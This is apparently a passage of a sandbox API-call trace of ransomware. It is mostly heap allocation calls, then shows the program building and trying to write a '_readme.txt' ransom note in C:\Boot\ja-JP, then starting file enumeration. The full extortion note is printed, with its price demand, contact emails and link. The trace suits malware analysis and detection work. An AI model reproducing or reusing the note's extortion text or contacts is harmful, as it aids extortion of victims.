(HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.890] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0183.890] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.890] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.890] PathFindFileNameW (pszPath="") returned="" [0183.890] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.891] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.891] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.891] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.892] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0183.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.892] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0183.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.893] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.893] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.893] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.894] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.895] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.895] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, 